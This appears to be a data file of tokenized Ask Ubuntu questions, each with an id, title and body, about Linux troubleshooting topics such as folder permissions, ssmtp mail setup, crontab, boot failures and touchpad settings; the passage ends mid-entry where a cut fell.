502298	how does one choose permissions for each folder ?	i understand how to change the permissions on my folders using chmod and chown but i 'm not sure what the permissions should be . for example , the first folder currently gives full access to root , read and execute to group root and for some reason executable access to everyone . that does n't seem to make sense to me . i keep thinking i 'm not reading it correctly but it could also be necessary for some unknown reason . note , i have my permissions for var/www/html ( where i am putting my website ) as 755 , but these are the other directories and they seem to be leaving things open to random people . i 'm mainly concerned that if i shut them all off , some web functionalities wo n't work . total 44 drwxr-xr-x 2 root root 4096 jul 24 06:35 backups drwxr-xr-x 8 root root 4096 jul 23 20:54 cache drwxrwxrwt 2 root root 4096 apr 20 06:23 crash drwxr-xr-x 34 root root 4096 jul 23 20:54 lib drwxrwsr-x 2 root staff 4096 apr 10 15:12 local lrwxrwxrwx 1 root root 9 apr 20 06:20 lock - > /run/lock drwxrwxr-x 11 root syslog 4096 jul 24 06:35 log drwxrwsr-x 2 root mail 4096 apr 16 14:02 mail drwxr-xr-x 2 root root 4096 apr 16 14:02 opt lrwxrwxrwx 1 root root 4 apr 20 06:20 run - > /run drwxr-xr-x 5 root root 4096 apr 20 06:20 spool drwxrwxrwt 2 root root 4096 apr 20 06:24 tmp drwxr-xr-x 3 root root 4096 jul 23 14:19 www
502302	how can i see the fancy prompt in byobu on windows ?	i installed a new ubuntu server on 14.04 and need to access it using windows . i am currently using puttytray , and i installed the ubuntu fonts and set ubuntu mono as my default font in order to get the ubuntu logo in the corner to work in byobu . however , the fancy prompt does n't work . while i could edit the prompt or alt+f5 to switch to the non-utf charmap , i 'd rather see the prompt as i rather like it ! this is what it looks like on my computer : this is what it looks like in gnome-terminal with the fancy prompt ( example not mine ) : is there a way to get this to work on windows as well ? if it 's relevant , i am running windows 8.1 .
502304	kubuntu 12.10 updating issue	i am wondering if anyone is having issues with updates from ubuntu with version 12.10 ? it was working fine up until a monthish ago , and now i never get any update notifications , and when i manually check i am getting errors that ubuntu websites are not available to check . i know 12.10 is slightly older but do they really stop updating it ?
502305	bundle install permissions denied	hello i am working on a new ubuntu machine and when i run tasks like : bundle install or rvm get head i get errors like : downloading https : //get.rvm.io bash : line 709 : /usr/local/rvm/release : permission denied could not update rvm , get some help at # rvm irc channel at freenode servers . and gem : :filepermissionerror : you do n't have write permissions for the /usr/local/rvm/gems/ruby-2.1.2/bin directory . an error occurred while installing rake ( 10.3.2 ) , and bundler can not continue . make sure that `gem install rake -v '10.3.2'` succeeds before bundling . i defiantly have rake installed and it shows up when i sudo gem update in the list but my bundler is not picking it up . do i need to enable permissions before i can run these commands ? thanks anyone who knows what exactly what my issue is .
502307	installation problem need help	so im about to install ubuntu 14.04 and it pops up a mussage saying `` the attempt to mount a file system with type vfat in ssi1 ( 0,0,0 ) , partition # 1 ( sda ) at/boot/efi failed '' can someone help please ?
502309	hiding dconfig from standard user	currently , our systems have a standard user account for our patrons to use and an administrator account . i used dconfig to limit what the standard user can do . however i noticed that the standard user can open up dconfig and undo all the changes i made . is there a way to limit the standard user account ? i also want to hide the system settings from the standard user , is that possible ? or is there a way if they do change system settings , a reboot would undo all the changes they made ? i 'm quite new to ubuntu so still learning a lot . any help greatly appreciated it .
502315	can i pay for bugs to be fixed ?	i 've got a bug report that 's been sitting in status new , importance undecided for a while . is it possible to pay for a specific bug to be fixed ? in http : //askubuntu.com/a/231339/14772 , it 's said that you can pay for bugs to be fixed : if you do n't want to wait for a solution , you can only try to solve it yourself ( if you have enough knowledge ) or try to get someone with the knowledge to solve it ( either paying or asking nicely once ) . this is described as separate from pay support if you want better care you can always opt for pay support , but it does n't come cheap . please check what some option covers before buying it . if you want a developer ready to solve your bugs are soon as you find them , you will need to pay thousand of dollars/year . i came across an article mentioning bountysource , but i do n't know how well-received bug fixes resulting from bountysource are by the ubuntu community . edit : since i 've been asked what the bug is , it 's 1337015 , which affects geany .
502320	bittorrent programs killing networking - broadcom wireless	this started happening after i did a fresh install of 14.04 ( previously i was on 13.04 ) . when ever i launch a bittorrent client my dns very quickly stops responding , and then the network connection itself stops working completely ( to the point of disconnecting and failing to see the network again ) . it works just fine on my wired connection , but with wireless ( which is a broadcom ; i followed the steps here : http : //ubuntuforums.org/showthread.php ? t=2218898 to get it working ) then it craps out . edit : i have verified that i have the correct drivers installed . my output is 09:00.0 ethernet controller [ 0200 ] : broadcom corporation netxtreme bcm5755m gigabit ethernet pci express [ 14e4:1673 ] ( rev 02 ) 0c:00.0 network controller [ 0280 ] : broadcom corporation bcm4311 802.11b/g wlan [ 14e4:4311 ] ( rev 01 ) and i have linux-firmware-nonfree installed .
502321	booting from usb with raid	i am trying to install the latest version of ubuntu on a dell precision t3500 . but when i boot to usb stick . i get an error that says busybox v1.21.1 ( ubuntu 1:1.21.0-1ubuntu1 ) build-in shell ( ash ) enter 'help ' for a list of build-in commands ( initramfs ) mount : mounting /dev/loop0 on //filesystem.squashfs failed : invalid argument can not mount /dev/loop0 ( /cdrom/casper/filesystem.squashfs ) on //filesystems.squashfs any ideas ? thanks , scott
502323	external hdd working on ubuntu live cd but not ubuntu server	i have an external usb 3.0 drive that works when plugged into a windows 8 machine and when running an ubuntu live cd . it will mount and is accessible as both fat32 and ext4 in the live cd . when plugged into the same server running ubuntu server it will show up with no name in lsusb and running the command `` sudo fdisk -l '' only the ssd in the server displays . i 've tried 2 different enclosures and am at my wits end . i ca n't figure out what is so different with regards to usb between ubuntu server and ubuntu desktop that one works and the other does n't .
502325	ubuntu 14.04 on hp pavillion dm4 will not connect to the internet	the computer originally had windows 7 on it then i installed ubuntu . once the setup was complete i tried to connect to the internet and it will not connect to my home network .
502326	how to run command in to another command ?	how to run command in to another command ? example curl 123+echo shuf 100-999 -n 1+blabla.html so that end would be random curl 123999blabla.html curl 123111blabla.html curl 123000blabla.html
502328	what are best number randomizers witch can be inputed into another line ?	i want to make random lines like , so how to make random number generators example for 3 numbers like 000-999 ? witch cane incorporated/included/combined into another command like curl 123999blabla.html curl 123111blabla.html curl 123000blabla.html
502329	how to list all available mono runtimes	i want to see what mono runtimes are installed on my ubuntu 2014.04 . how to do ? for now it is just trial-and-error : mono -- runtime=v2.0.50727 - > ok mono -- runtime=v3.0 - > ko mono -- runtime=v4.0.30319 - > ok where can i see the list of numbers like 4.0.30319 that are ok ?
502333	ubuntu 12.4 starts with a balch window agter installing kivi	iam running ubuntu 12.4 in dual boot with windows 7 on my machine .i installed kivi ( with ubuntu ) , and when i just have rebooted the machine , ubuntu starts with a balck window .i tyed the recovery mode , also cheked files , tryed to upgarde to ubuntu 14 but it did n't work because libgl had a non adequate version .i am out of solutions , thanks for help .
502334	unable to send email using ssmtp from home computer	after opening the port and having no success , i disabled the belkin router completely . so now there is no firewall blocking traffic . however , i continue to get the following error : ssmtp : can not open smtp.gmail:465 i added these lines to /etc/ssmtp/ssmtp.conf : root=myemail @ gmail.com mailhub=smtp.gmail:465 rewritedomain=gmail.com authuser=myemail @ gmail.com authpass=123456 fromlineoverride=yes usetls=yes then i run the following : ssmtp anothermail @ gmail.com to : anothermail @ gmail.com from : myemail @ gmail.com subject : some email some more info and i press ctrl+d and get this message : ssmtp : can not open smtp.gmail:465 what might i be doing wrong ?
502340	can not download minecraft	alright , now before i start i 'm not the most tech savvy person out there so i dont know alot of terms and how to do things . i mean i know what a command , terminal , and argument is and all that but i ca n't understand everything so if you happen to answer my question , you have to help me through step by step . anyway my question is , i am downloading minecraft on ubuntu running the version 12.o1 and i go into firefox and go to the right page for it but i start the download and it asks what i want to do to the file . the only thing i can select is save file . the minute i click download file , firefox crashes . i do n't know why but i am selecting the right .jar file and everything . then in my download folder i have a .jar minecraft file and i ca n't open it . the thing says you need to be able to execute it . so i go into properties and select the option . i ca n't seem to figure it out . please help ...
502341	crontab does not work	i have 2 crontab commands . the cron below works fine : 00 19 * * * cp -a /home/kmportal/virtualbox\ vms/cyn.in-disk1.vmdk /media/windowsshare the cron below does not work after i add the time behind : 05 09 * * * cp -a /home/kmportal/virtualbox\ vms/cyn.in-disk1.vmdk /media/windowsshare/'date + % y % m % d % h % m % s'cyn.in-disk1.vmdk please guide me to understand the command and how to solve .
502344	is it possible to configure 6 monitors with a amd r7 260x in different graphical virtual consoles ?	i have a project to configure 6 monitors using eyefinity technology from amd so i 'm figuring out the way to do it , i 'm thinking to use tentatively the xfx r7 260x card with 2 dvi ports ( dvi-i , dvi-d ) , 1 hdmi and 1 dp and i 'm thinking to connect one monitor to the dvi-i , another one to the dvi-d , one to the hdmi and 3 to the dp using a mst hub , and after that try to open each monitor in different graphical virtual consoles so each one will be totally independent . i read that in kernel 3.16 will be fully working the mst hub , anyway is it possible to put it working with the catalyst drivers ? if it 's not , probably i could use and msi amd radeon hd 7970 with 4 dp and 2 dvi . i guess i have to define each monitor in xorg.conf but i 'm not sure if it 's just that . i really will appreciate any help . eduardo
502345	how do i uninstall a click package ?	as a developer , how do i uninstall a click package for ubuntu touch / ubuntu phone ?
502351	issues installing ubuntu 14.04 lts	i have been trying for the past couple of days to install ubuntu 14.04 lts on my laptop . i have been having problems left and right , but i finally ran into one that i ca n't figure out . i put ubuntu on a usb drive using unetbootin and booted ( in csm mode - uefi did n't work ) into the live session . i ran the installer , which failed . i traced the problem to the hard drive , which had a magnet dropped on it over a year ago , and i reformatted it the long way . i ran the installer again , successfully . then , i shut down , removed the usb drive , and started my computer ( boot sequence : usb , hdd , ... ) - and my computer tells me there is no bootable device . i force shut down my computer and reinserted the usb , booted into the live session , and ran boot repair . still ca n't boot from the hdd . coming from a windows background , i 'm a newbie to all things linux . i do n't know what is causing my problem ( the hard drive ? ? ) , and do n't know what to look for to help me find out . computer : 64 bit toshiba satellite c855d laptop - came with windows 8 preinstalled , but i removed that hard drive and put in the 500 gb one . hard drive : 500 gb toshiba mk5065gsx boot repair url ( maybe irrelevant - ca n't hurt ) : http : //paste.ubuntu.com/7847577 i took a look at this page ( https : //help.ubuntu.com/community/uefi ) and thought that maybe my installation would work if i converted it to efi mode ( ubuntu was installed in csm mode , because if i tried in uefi mode , all i got after selecting an option on the boot menu was a blank/black screen ) . would that make a difference ? if so , how would i go about it ? the page says i need to create an efi partition , which i do n't know how to do , and the requirements of mount point and flag mean nothing to me . so , the short version of my question : why wo n't my hard drive boot ? update : i looked through the folders on my hard drive , and found that the `` boot '' and `` sys '' folders were empty ! like i said above , i am new to linux/ubuntu , but i assume that these folders are important . i ran the installer again , and now the `` boot '' folder has some stuff in it ( grub folder and a few other files ) , but the `` sys '' folder is still empty . i think this is part if not all of my problem ; what should i do about it ?
502356	how to downgrade gdb 7.6.1 to gdb 6.8 ?	i am using linux ( ubuntu 13.10 ) for openfoam ( free ware ) which calculate the fluid motion . openfoam program is really uncomfortable to use , they even provide debug : ) so to me , i need to use gdb for debugging openfoam , but gdb 7.6 version cause some problem to debugging openfoam ; ( i thought this is not a problem of gdb , just because of openfoam . but i heard that gdb 6.8 didnt crash with openfoam debugging . so i want to install gdb 6.8 for this . but i dont know how to install gdb 6.8 in ubuntu 13.10 version . and i cant find a any solution for this . please send me a solution for this ( install gdb 6.8 instead of gdb 7.6 ) thank you
502358	xbox controller triggers	i 'm having issues with my xbox wired controller in linux . the triggers , when pressed once , get stuck in on mode ( not physically , but so far as the data is concerned ) . they do n't default to a 0 , but rather -3267 and 3267 when pressed . this causes game breaking issues with any game that seems to use them . press the right trigger to pull out your wand temporarily ? your wand is out permanently out with no trigger press that reverts the action . this is just an example , of course , but i ca n't figure this out to save my life apparently and it 's really bugging me . anyone have any ideas ?
502364	non-x/non-gui terminal emulator for ubuntu server	i have a computer running ubuntu server ( non-x/non-gui ) , i need a terminal emulator which has vt100/vt320 capabilities like gnome-term and xterm do on my other ( gui ) ubuntu box . tmux and gnu screen do n't work properly ( they do n't respond to all vt commands like gnome-term and xterm do ) . so besides tmux and gnu screen , are there any other non-x/non-gui terminal emulators out there for ubuntu ? do n't need modem or telnet capabilities , just a shell .
502366	unable to install clamav-0.98.4 . getting error	i have tried installing clamav-0.98.4.tar.gz ( downloaded from site ) by 1 ) extracting 2 ) ./configure 3 ) make 4 ) make install .. but after 2nd step only it gives this error and does n't proceed further . hanush14 @ hanush14-hp-pavilion-dv2700-notebook-pc : ~ $ cd /home/hanush14/downloads/clamav-0.98.4 hanush14 @ hanush14-hp-pavilion-dv2700-notebook-pc : ~/downloads/clamav-0.98.4 $ ./configure checking build system type ... x86_64-unknown-linux-gnu checking host system type ... x86_64-unknown-linux-gnu checking target system type ... x86_64-unknown-linux-gnu creating target.h - canonical system defines checking for a bsd-compatible install ... /usr/bin/install -c checking whether build environment is sane ... yes checking for a thread-safe mkdir -p ... /bin/mkdir -p checking for gawk ... gawk checking whether make sets $ ( make ) ... yes checking how to create a ustar tar archive ... gnutar checking whether make supports nested variables ... yes checking for style of include used by make ... gnu checking for gcc ... gcc checking whether the c compiler works ... yes checking for c compiler default output file name ... a.out checking for suffix of executables ... checking whether we are cross compiling ... no checking for suffix of object files ... o checking whether we are using the gnu c compiler ... yes checking whether gcc accepts -g ... yes checking for gcc option to accept iso c89 ... none needed checking dependency style of gcc ... gcc3 checking how to run the c preprocessor ... gcc -e checking for grep that handles long lines and -e ... /bin/grep checking for egrep ... /bin/grep -e checking for ansi c header files ... yes checking for sys/types.h ... yes checking for sys/stat.h ... yes checking for stdlib.h ... yes checking for string.h ... yes checking for memory.h ... yes checking for strings.h ... yes checking for inttypes.h ... yes checking for stdint.h ... yes checking for unistd.h ... yes checking minix/config.h usability ... no checking minix/config.h presence ... no checking for minix/config.h ... no checking whether it is safe to define __extensions__ ... yes checking how to print strings ... printf checking for a sed that does not truncate output ... /bin/sed checking for fgrep ... /bin/grep -f checking for ld used by gcc ... /usr/bin/ld checking if the linker ( /usr/bin/ld ) is gnu ld ... yes checking for bsd- or ms-compatible name lister ( nm ) ... /usr/bin/nm -b checking the name lister ( /usr/bin/nm -b ) interface ... bsd nm checking whether ln -s works ... yes checking the maximum length of command line arguments ... 1572864 checking whether the shell understands some xsi constructs ... yes checking whether the shell understands `` += '' ... yes checking how to convert x86_64-unknown-linux-gnu file names to x86_64-unknown-linux-gnu format ... func_convert_file_noop checking how to convert x86_64-unknown-linux-gnu file names to toolchain format ... func_convert_file_noop checking for /usr/bin/ld option to reload object files ... -r checking for objdump ... objdump checking how to recognize dependent libraries ... pass_all checking for dlltool ... no checking how to associate runtime and link libraries ... printf % s\n checking for ar ... ar checking for archiver @ file support ... @ checking for strip ... strip checking for ranlib ... ranlib checking command to parse /usr/bin/nm -b output from gcc object ... ok checking for sysroot ... no checking for mt ... mt checking if mt is a manifest tool ... no checking for dlfcn.h ... yes checking for objdir ... .libs checking if gcc supports -fno-rtti -fno-exceptions ... no checking for gcc option to produce pic ... -fpic -dpic checking if gcc pic flag -fpic -dpic works ... yes checking if gcc static flag -static works ... yes checking if gcc supports -c -o file.o ... yes checking if gcc supports -c -o file.o ... ( cached ) yes checking whether the gcc linker ( /usr/bin/ld -m elf_x86_64 ) supports shared libraries ... yes checking whether -lc should be explicitly linked in ... no checking dynamic linker characteristics ... gnu/linux ld.so checking how to hardcode library paths into programs ... immediate checking for shl_load ... no checking for shl_load in -ldld ... no checking for dlopen ... no checking for dlopen in -ldl ... yes checking whether a program can dlopen itself ... yes checking whether a statically linked program can dlopen itself ... no checking whether stripping libraries is possible ... yes checking if libtool supports shared libraries ... yes checking whether to build shared libraries ... yes checking whether to build static libraries ... no checking which extension is used for runtime loadable modules ... .so checking which variable specifies run-time module search path ... ld_library_path checking for the default library search path ... /lib /usr/lib /usr/lib/x86_64-linux-gnu/libfakeroot /usr/local/lib /lib/x86_64-linux-gnu /usr/lib/x86_64-linux-gnu /usr/lib/x86_64-linux-gnu/mesa-egl /usr/lib/x86_64-linux-gnu/mesa checking for library containing dlopen ... -ldl checking for dlerror ... yes checking for shl_load ... ( cached ) no checking for shl_load in -ldld ... ( cached ) no checking for dld_link in -ldld ... no checking for _ prefix in compiled symbols ... no checking whether deplibs are loaded by dlopen ... yes checking for argz.h ... yes checking for error_t ... yes checking for argz_add ... yes checking for argz_append ... yes checking for argz_count ... yes checking for argz_create_sep ... yes checking for argz_insert ... yes checking for argz_next ... yes checking for argz_stringify ... yes checking if argz actually works ... yes checking whether libtool supports -dlopen/-dlpreopen ... yes checking for ltdl.h ... no checking where to find libltdl headers ... -i $ { top_srcdir } /libltdl checking where to find libltdl library ... $ { top_build_prefix } libltdl/libltdlc.la checking for unistd.h ... ( cached ) yes checking for dl.h ... no checking for sys/dl.h ... no checking for dld.h ... no checking for mach-o/dyld.h ... no checking for dirent.h ... yes checking for closedir ... yes checking for opendir ... yes checking for readdir ... yes checking for strlcat ... no checking for strlcpy ... no checking for gcc ... ( cached ) gcc checking whether we are using the gnu c compiler ... ( cached ) yes checking whether gcc accepts -g ... ( cached ) yes checking for gcc option to accept iso c89 ... ( cached ) none needed checking dependency style of gcc ... ( cached ) gcc3 checking whether ln -s works ... yes checking whether make sets $ ( make ) ... ( cached ) yes checking for cos in -lm ... yes checking for stdint.h ... ( cached ) yes checking for unistd.h ... ( cached ) yes checking sys/int_types.h usability ... no checking sys/int_types.h presence ... no checking for sys/int_types.h ... no checking for dlfcn.h ... ( cached ) yes checking for inttypes.h ... ( cached ) yes checking sys/inttypes.h usability ... no checking sys/inttypes.h presence ... no checking for sys/inttypes.h ... no checking sys/times.h usability ... yes checking sys/times.h presence ... yes checking for sys/times.h ... yes checking for memory.h ... ( cached ) yes checking ndir.h usability ... no checking ndir.h presence ... no checking for ndir.h ... no checking for stdlib.h ... ( cached ) yes checking for strings.h ... ( cached ) yes checking for string.h ... ( cached ) yes checking sys/mman.h usability ... yes checking sys/mman.h presence ... yes checking for sys/mman.h ... yes checking sys/param.h usability ... yes checking sys/param.h presence ... yes checking for sys/param.h ... yes checking for sys/stat.h ... ( cached ) yes checking for sys/types.h ... ( cached ) yes checking malloc.h usability ... yes checking malloc.h presence ... yes checking for malloc.h ... yes checking poll.h usability ... yes checking poll.h presence ... yes checking for poll.h ... yes checking limits.h usability ... yes checking limits.h presence ... yes checking for limits.h ... yes checking sys/filio.h usability ... no checking sys/filio.h presence ... no checking for sys/filio.h ... no checking sys/uio.h usability ... yes checking sys/uio.h presence ... yes checking for sys/uio.h ... yes checking termios.h usability ... yes checking termios.h presence ... yes checking for termios.h ... yes checking stdbool.h usability ... yes checking stdbool.h presence ... yes checking for stdbool.h ... yes checking pwd.h usability ... yes checking pwd.h presence ... yes checking for pwd.h ... yes checking grp.h usability ... yes checking grp.h presence ... yes checking for grp.h ... yes checking syslog.h usability ... yes checking syslog.h presence ... yes checking for syslog.h ... yes checking pthread.h usability ... yes checking pthread.h presence ... yes checking for pthread.h ... yes checking for multiarch libdir ... $ { exec_prefix } /lib checking for c/c++ restrict keyword ... __restrict checking for an ansi c-conforming const ... yes checking for inline ... inline checking whether byte ordering is bigendian ... no checking for a supported version of gcc ... ok ( 4.8 ) checking for gcc bug pr27603 ... ok , bug not present checking for gcc bug pr26763-2 ... ok , bug not present checking for valid code generation of cli_iscontained ... ok , bug not present checking for gcc bug pr28045 ... ok , bug not present checking for gcc bug pr37573 ... ok , bug not present checking for off_t ... yes checking size of short ... 2 checking size of int ... 4 checking size of long ... 8 checking size of long long ... 8 checking size of void * ... 8 checking for ld -- version-script ... yes checking whether uname ( 2 ) is posix ... yes checking for bind in -lsocket ... no checking for library containing gethostent ... none required checking for poll ... yes checking for setsid ... yes checking for memcpy ... yes checking for snprintf ... yes checking for vsnprintf ... yes checking for strerror_r ... yes checking for strlcpy ... ( cached ) no checking for strlcat ... ( cached ) no checking for strcasestr ... yes checking for inet_ntop ... yes checking for setgroups ... yes checking for initgroups ... yes checking for ctime_r ... yes checking for mkstemp ... yes checking for mallinfo ... yes checking for madvise ... yes checking for _largefile_source value needed for large files ... no checking for working mmap ... yes checking for sysconf ( _sc_pagesize ) ... yes checking for getpagesize ( ) ... yes checking for map_anon ( ymous ) ... map_anonymous checking for enable_extended_file_stdio ... no checking for timegm ... yes checking for sysctlbyname ... no checking for ld used by gcc ... /usr/bin/ld -m elf_x86_64 checking if the linker ( /usr/bin/ld -m elf_x86_64 ) is gnu ld ... yes checking for shared library run path origin ... done checking check.h usability ... yes checking check.h presence ... yes checking for check.h ... yes checking linking with check ... ok configure : compiling and linking with check by using -lcheck checking for libxml2 installation ... not found configure : ****** libxml2 support unavailable checking for openssl installation ... /usr configure : error : openssl not found .
502368	how can i move systray icons from indicator to notification area ?	ubuntu 14.04 , gnome classic some systray icons only show in indicator , just like nm-applet , clipit fcitx and others , some systray icons can show in notification area just like : gnome-sound-applet , gnome-do and others . so how can i move systray icons from indicator to notification area ?
502369	could not open gui in on dedicated server after installing unity	after installing 14.04 server and installing unity i could not load the gui . this is the error i got : loading extension glx modprobe : error : ../libkmod/libkmod.c:556 kmod_search_moddep ( ) could not open moddep file '/lib/modules/3.10.23-xxxx-std-ipv6-64/modules.dep.bin'
502370	is this a good idea on ubuntu ?	so i have a basic understanding of hypervisors and have decided i should start making use of them . i 'm planning on doing the following : ubuntu ( base system ) =====virtual box====== arch + kali + osx + win7 i have the ram and disk for this but is it a good idea ? my aim is to basically make my laptop an it pocket knife that i can whip out and fix anything with . what is recommended for creating partitions and what size should they be ? cheers
502372	ca n't move mouse short distances using touchpad	i recently got a new lenovo y50 , and i 'm running ubuntu 14.04 . on my previous dell xps 17 , the touchpad had excellent response even when moving my finger slightly -- by moving my finger a very short distance , i was able to move the mouse a pixel at a time , which was very helpful for , e.g. , grabbing narrow window borders . on this new machine however , the mouse does not respond until i 've moved my finger about a half-centimeter , at which point the mouse will jump a dozen pixels or so . once the mouse is moving in this manner , i am able to move it arbitrarily precise distances by moving my finger more slowly . i would like to have this tight precision even if i 'm not already moving the mouse . ( note : this problem does not occur when using a usb mouse . ) i thought disabling noise cancellation in xinput may help , so i set noise cancellation values to zero , but this did n't help . palm detection is also set to zero . does anyone know how to achieve mouse precision for small touchpad movements ? thank you ! for reference , xinput properties : $ xinput list-props 'etps/2 elantech touchpad' device 'etps/2 elantech touchpad ' : device enabled ( 155 ) : 1 coordinate transformation matrix ( 157 ) : 1.000000 , 0.000000 , 0.000000 , 0.000000 , 1.000000 , 0.000000 , 0.000000 , 0.000000 , 1.000000 device accel profile ( 278 ) : 1 device accel constant deceleration ( 279 ) : 1.750000 device accel adaptive deceleration ( 280 ) : 1.000000 device accel velocity scaling ( 281 ) : 12.500000 synaptics edges ( 282 ) : 127 , 3061 , 112 , 1973 synaptics finger ( 283 ) : 1 , 1 , 0 synaptics tap time ( 284 ) : 180 synaptics tap move ( 285 ) : 10 synaptics tap durations ( 286 ) : 180 , 180 , 100 synaptics clickpad ( 287 ) : 1 synaptics middle button timeout ( 288 ) : 0 synaptics two-finger pressure ( 289 ) : 282 synaptics two-finger width ( 290 ) : 7 synaptics scrolling distance ( 291 ) : 45 , 45 synaptics edge scrolling ( 292 ) : 0 , 0 , 0 synaptics two-finger scrolling ( 293 ) : 1 , 1 synaptics move speed ( 294 ) : 1.000000 , 1.750000 , 0.052507 , 0.000000 synaptics off ( 295 ) : 0 synaptics locked drags ( 296 ) : 0 synaptics locked drags timeout ( 297 ) : 5000 synaptics tap action ( 298 ) : 2 , 3 , 0 , 0 , 1 , 3 , 0 synaptics click action ( 299 ) : 1 , 3 , 0 synaptics circular scrolling ( 300 ) : 0 synaptics circular scrolling distance ( 301 ) : 0.100000 synaptics circular scrolling trigger ( 302 ) : 0 synaptics circular pad ( 303 ) : 0 synaptics palm detection ( 304 ) : 0 synaptics palm dimensions ( 305 ) : 1000 , 1000 synaptics coasting speed ( 306 ) : 20.000000 , 50.000000 synaptics pressure motion ( 307 ) : 30 , 160 synaptics pressure motion factor ( 308 ) : 1.000000 , 1.000000 synaptics resolution detect ( 309 ) : 1 synaptics grab event device ( 310 ) : 1 synaptics gestures ( 311 ) : 1 synaptics capabilities ( 312 ) : 1 , 0 , 0 , 1 , 1 , 1 , 1 synaptics pad resolution ( 313 ) : 32 , 32 synaptics area ( 314 ) : 0 , 0 , 0 , 0 synaptics soft button areas ( 315 ) : 1594 , 0 , 1709 , 0 , 0 , 0 , 0 , 0 synaptics noise cancellation ( 316 ) : 0 , 0 device product id ( 271 ) : 2 , 14 device node ( 272 ) : `` /dev/input/event5 '' for reference , synclient parameters : $ synclient parameter settings : leftedge = 127 rightedge = 3061 topedge = 112 bottomedge = 1973 fingerlow = 1 fingerhigh = 1 maxtaptime = 180 maxtapmove = 100 maxdoubletaptime = 180 singletaptimeout = 180 clicktime = 100 emulatemidbuttontime = 0 emulatetwofingerminz = 282 emulatetwofingerminw = 7 vertscrolldelta = 45 horizscrolldelta = 45 vertedgescroll = 0 horizedgescroll = 0 cornercoasting = 0 verttwofingerscroll = 1 horiztwofingerscroll = 1 minspeed = 1 maxspeed = 1.75 accelfactor = 0.0525072 touchpadoff = 0 lockeddrags = 0 lockeddragtimeout = 5000 rtcornerbutton = 2 rbcornerbutton = 3 ltcornerbutton = 0 lbcornerbutton = 0 tapbutton1 = 1 tapbutton2 = 3 tapbutton3 = 0 clickfinger1 = 1 clickfinger2 = 3 clickfinger3 = 0 circularscrolling = 0 circscrolldelta = 0.1 circscrolltrigger = 0 circularpad = 0 palmdetect = 0 palmminwidth = 1000 palmminz = 1000 coastingspeed = 20 coastingfriction = 50 pressuremotionminz = 30 pressuremotionmaxz = 160 pressuremotionminfactor = 1 pressuremotionmaxfactor = 1 resolutiondetect = 1 grabeventdevice = 1 tapanddraggesture = 1 arealeftedge = 0 arearightedge = 0 areatopedge = 0 areabottomedge = 0 horizhysteresis = 0 verthysteresis = 0 clickpad = 1 rightbuttonarealeft = 1594 rightbuttonarearight = 0 rightbuttonareatop = 1709 rightbuttonareabottom = 0 middlebuttonarealeft = 0 middlebuttonarearight = 0 middlebuttonareatop = 0 middlebuttonareabottom = 0
502376	g2/mx2/mx android tv box ubuntu installation	i have an android tv box with a cortex-a9 , dual core , 1gb rom , 8gb ram also called mx tv box or mx2 . i 'm trying to install ubuntu , but to install any operating system has to be done through the update on recovery mode , the os has to be on a zip file , in order for the box to install it . any one that has done this installation , or instructions how to built this zip file for installation ? ? ? ? thanks
502379	mountall : fsck /boot [ 333 ] terminated with status 1	i am running a ubuntu precise 12.04.4 lts vm on an esxi . suddenly , the boot up process started crashing with the following message : /dev/mapper/luxsrv -- vg-boot : 251/249856 files ( 6.4 % non-contiguous ) , 168519/499712 blocks mountall : fsck /boot [ 333 ] terminated with status 1 i also noticed that before these messages , there was a `` md0 : unknown partition table '' message . i went to an earlier snapshot and compared the actual fstab , blkdid and fdisk -l results and they are identical except for the `` ... does n't contain a valid partition table '' which show up on the working snapshot , so they should be of no concern . i can boot into rescue mode , login with root and access all my data . all this has left stumped and would appreciate some help or ideas on how to solve this problem . thank you , joe root @ luxsrv : ~ # cat /etc/fstab # /etc/fstab : static file system information . # # use 'blkid ' to print the universally unique identifier for a # device ; this may be used with uuid= as a more robust way to name devices # that works even if disks are added and removed . see fstab ( 5 ) . # # < file system > < mount point > < type > < options > < dump > < pass > proc /proc proc nodev , noexec , nosuid 0 0 /dev/mapper/luxsrv -- vg-root / ext4 errors=remount-ro , usrjquota=quota.user , grpjquota=quota.group , jqfmt=vfsv0 0 1 /dev/mapper/luxsrv -- vg-boot /boot ext2 defaults 0 2 /dev/mapper/luxsrv -- vg-swap none swap sw 0 0 /dev/fd0 /media/floppy0 auto rw , user , noauto , exec , utf8 0 0 root @ luxsrv : ~ # blkid /dev/sda1 : uuid= '' a20519ce-3e01-1815-bb38-8ac88d4bc550 '' uuid_sub= '' 93e4fce8-5d9e-c4cc-9bc6-46799990f12a '' label= '' luxsrv:0 '' type= '' linux_raid_member '' /dev/sdb1 : uuid= '' a20519ce-3e01-1815-bb38-8ac88d4bc550 '' uuid_sub= '' 4c99f697-ae34-7761-aa82-1edfa99fc535 '' label= '' luxsrv:0 '' type= '' linux_raid_member '' /dev/md0 : uuid= '' 1gccop-wewz-jxxo-dvpj-zv5l-7qvo-3uhggu '' type= '' lvm2_member '' /dev/mapper/luxsrv -- vg-boot : uuid= '' 95a1f29d-7749-4913-81c2-31fb66ca5bfd '' type= '' ext2 '' /dev/mapper/luxsrv -- vg-swap : uuid= '' 00a3d999-6607-46c4-845b-0866ac3638a2 '' type= '' swap '' /dev/mapper/luxsrv -- vg-root : uuid= '' e1e7a268-2e0a-4a80-83c0-09cac49fc84b '' type= '' ext4 '' root @ luxsrv : ~ # fdisk -l disk /dev/sda : 171.8 gb , 171798691840 bytes 255 heads , 63 sectors/track , 20886 cylinders , total 335544320 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00012ceb device boot start end blocks id system /dev/sda1 * 2048 335542271 167770112 fd linux raid autodetect disk /dev/sdb : 171.8 gb , 171798691840 bytes 255 heads , 63 sectors/track , 20886 cylinders , total 335544320 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00085742 device boot start end blocks id system /dev/sdb1 2048 335542271 167770112 fd linux raid autodetect disk /dev/md0 : 171.7 gb , 171662245888 bytes 2 heads , 4 sectors/track , 41909728 cylinders , total 335277824 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00000000 disk /dev/md0 does n't contain a valid partition table disk /dev/mapper/luxsrv -- vg-boot : 511 mb , 511705088 bytes 255 heads , 63 sectors/track , 62 cylinders , total 999424 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( 